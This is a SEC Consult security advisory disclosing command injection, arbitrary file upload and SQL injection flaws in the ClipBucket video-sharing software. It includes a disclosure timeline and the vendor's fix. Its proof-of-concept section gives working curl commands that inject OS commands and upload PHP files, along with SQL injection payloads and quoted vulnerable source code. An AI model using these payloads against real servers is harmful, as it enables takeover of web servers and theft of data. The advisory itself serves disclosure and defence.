ClipBucket SQL Injection / Command Injection / File Upload

`SEC Consult Vulnerability Lab Security Advisory < 20180227-0 >  
=======================================================================  
title: OS command injection, arbitrary file upload & SQL injection  
product: ClipBucket  
vulnerable version: <4.0.0 - Release 4902  
fixed version: 4.0.0 - Release 4902  
CVE number: -  
impact: critical  
homepage: http://clipbucket.com/  
found: 2017-09-06  
by: Ahmad Ramadhan Amizudin (Office Kuala Lumpur)  
Wan Ikram (Office Kuala Lumpur)  
Fikri Fadzil (Office Kuala Lumpur)  
Jasveer Singh (Office Kuala Lumpur)  
SEC Consult Vulnerability Lab  
  
An integrated part of SEC Consult  
Bangkok - Berlin - Linz - Luxembourg - Montreal  
Moscow - Munich - Kuala Lumpur - Singapore  
Vienna (HQ) - Vilnius - Zurich  
  
https://www.sec-consult.com  
  
=======================================================================  
  
Vendor description:  
-------------------  
"ClipBucket is a free and open source software which helps us to create a  
complete video sharing website like YouTube, Dailymotion, Metacafe, Veoh, Hulu  
in few minutes of setup. It was first created in 2007 by Arslan Hassan and his  
team of developers. ClipBucket was developed as a YouTube clone but has been  
upgraded with advanced features and enhancements. It uses FFMPEG for video  
conversion and thumbs generation which is the most widely used application so,  
users can stream it straight away using the Video JS and HTML 5 Players."  
  
Source: https://clipbucket.com/about  
  
  
Business recommendation:  
------------------------  
By exploiting the vulnerabilities documented in this advisory, an attacker can  
fully compromise the web server which has ClipBucket installed. Potentially  
sensitive data might get exposed through this attack.  
  
Users are advised to immediately install the patched version provided by the  
vendor.  
  
  
Vulnerability overview/description:  
-----------------------------------  
1. Unauthenticated OS Command Injection  
Any OS commands can be injected by an unauthenticated attacker. This is a serious  
vulnerability as the chances for the system to be fully compromised is very  
high. This same vulnerability can also be exploited by authenticated attackers  
with normal user privileges.  
  
2. Unauthenticated Arbitrary File Upload  
A malicious file can be uploaded into the webserver by an unauthenticated  
attacker. It is possible for an attacker to upload a script to issue operating  
system commands. This same vulnerability can also be exploited by an  
authenticated attacker with normal user privileges.  
  
3. Unauthenticated Blind SQL Injection  
The identified SQL injection vulnerabilities enable an attacker to execute  
arbitrary SQL commands on the underlying MySQL server.  
  
  
Proof of concept:  
-----------------  
1. Unauthenticated OS Command Injection  
Without having to authenticate, an attacker can exploit this vulnerability  
by manipulating the "file_name" parameter during the file upload in the script  
/api/file_uploader.php:  
  
$ curl -F "[email protected]" -F "file_name=aa.php ||<<COMMAND HERE>>"  
http://$HOST/api/file_uploader.php  
  
  
Alternatively, this vulnerability can also be exploited by authenticated basic  
privileged users with the following payload by exploiting the same issue in  
/actions/file_downloader.php:  
  
$ curl --cookie "[--SNIP--]" --data "file=http://localhost/vid.mp4&file_name=abc  
|| <<COMMAND HERE>>" "http://$HOST/actions/file_downloader.php"  
  
  
2. Unauthenticated Arbitrary File Upload  
Below is the cURL request to upload arbitrary files to the webserver with no  
authentication required.  
  
$ curl -F "[email protected]" -F "plupload=1" -F "name=anyname.php"  
"http://$HOST/actions/beats_uploader.php"  
  
$ curl -F "[email protected]" -F "plupload=1" -F "name=anyname.php"  
"http://$HOST/actions/photo_uploader.php"  
  
Furthermore, this vulnerability is also available to authenticated users with  
basic privileges:  
  
$ curl --cookie "[--SNIP--]" -F  
"[email protected]"  
"http://$HOST/edit_account.php?mode=avatar_bg"  
  
  
3. Unauthenticated Blind SQL Injection  
The following parameters have been identified to be vulnerable against  
unauthenticated blind SQL injection.  
  
URL : http://$HOST/actions/vote_channel.php  
METHOD : POST  
PAYLOAD : channelId=channelId=1-BENCHMARK(100000000, rand())  
  
The source code excerpt below shows the vulnerable code  
VULN. FILE : /actions/vote_channel.php  
VULN. CODE :  
[...]  
$vote = $_POST["vote"];  
$userid = $_POST["channelId"];  
//if($userquery->login_check('',true)){  
if($vote == "yes"){  
$query = "UPDATE " . tbl("users") . " SET voted = voted + 1, likes = likes + 1  
WHERE userid = {$userid}";  
}else{  
//$query = "UPDATE " . tbl("users") . " SET likes = likes (- 1) WHERE userid =  
{$userid}";  
$sel = "Select userid,username,likes From ".tbl("users")." WHERE userid =  
{$userid}";  
$result = $db->Execute($sel);  
foreach ($result as $row )  
$current_likes = $row['likes'];  
$decremented_like = $current_likes-1;  
$query = "Update ".tbl("users")." Set likes = $decremented_like Where userid  
= $userid";  
}  
[...]  
  
URL : http://$HOST/ajax/commonAjax.php  
METHOD : POST  
PAYLOAD : mode=emailExists&email=1' or '1'='1  
  
The source code excerpt below shows the vulnerable code  
VULN. FILE : /ajax/commonAjax.php  
VULN. CODE :  
[...]  
$email = $_POST['email'];  
$check = $db->select(tbl('users'),"email"," email='$email'");  
if (!$check) {  
echo "NO";  
}  
[...]  
  
URL : http://$HOST/ajax/commonAjax.php  
METHOD : POST  
PAYLOAD : mode=userExists&username=1' or '1'='1  
  
The source code excerpt below shows the vulnerable code  
VULN. FILE : /ajax/commonAjax.php  
VULN. CODE :  
[...]  
$username = $_POST['username'];  
$check = $db->select(tbl('users'),"username"," username='$username'");  
if (!$check) {  
echo "NO";  
}  
[...]  
  
  
Vulnerable / tested versions:  
-----------------------------  
Clipbucket version 2.8.3 and version 4.0.0 have been tested. These versions were  
the latest at the time the security vulnerabilities were discovered.  
  
  
Vendor contact timeline:  
------------------------  
2017-10-17: Contacting vendor through email.  
2017-10-18: Vendor asking for additional details.  
2017-10-19: Replied to vendor.  
2017-10-26: Request update from vendor, no response.  
2017-11-09: Request update from vendor.  
2017-11-09: Vendor response with security patches.  
2017-11-10: Notified vendor the security patches don't fix the reported issues  
2017-11-30: Request update from vendor.  
2017-11-30: Vendor requesting for support via Skype  
2017-12-07: Response to vendor.  
2018-01-22: Checking version 4.0.0, vulnerabilities not fixed, asking vendor again  
2018-01-22: Vendor provides latest patches, scheduled for future release  
2018-01-26: Verified that the patches don't fully mitigate all issues.  
2018-01-29: Request update from vendor, no response.  
2018-02-06: Request update from vendor, no response.  
2018-02-08: Informing vendor of public release date  
2018-02-08: Vendor: Stable v4.0 including security fixes will be released in  
two weeks; postponing once again for two weeks  
2018-02-23: Request update from vendor.  
2018-02-26: Vendor publishes v4.0  
2018-02-27: Public release of security advisory  
  
  
  
Solution:  
---------  
The vendor provided the following patched version:  
https://github.com/arslancb/clipbucket/releases/download/4902/clipbucket-4902.zip  
  
  
Workaround:  
-----------  
None  
  
  
Advisory URL:  
-------------  
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html  
  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
SEC Consult Vulnerability Lab  
  
SEC Consult  
Bangkok - Berlin - Linz - Luxembourg - Montreal  
Moscow - Munich - Kuala Lumpur - Singapore  
Vienna (HQ) - Vilnius - Zurich  
  
About SEC Consult Vulnerability Lab  
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It  
ensures the continued knowledge gain of SEC Consult in the field of network  
and application security to stay ahead of the attacker. The SEC Consult  
Vulnerability Lab supports high-quality penetration testing and the evaluation  
of new offensive and defensive technologies for our customers. Hence our  
customers obtain the most current information about vulnerabilities and valid  
recommendation about the risk profile of new technologies.  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Interested to work with the experts of SEC Consult?  
Send us your application https://www.sec-consult.com/en/career/index.html  
  
Interested in improving your cyber security with the experts of SEC Consult?  
Contact our local offices https://www.sec-consult.com/en/contact/index.html  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Mail: research at sec-consult dot com  
Web: https://www.sec-consult.com  
Blog: http://blog.sec-consult.com  
Twitter: https://twitter.com/sec_consult  
  
EOF Ahmad Ramadhan / @2018  
  
`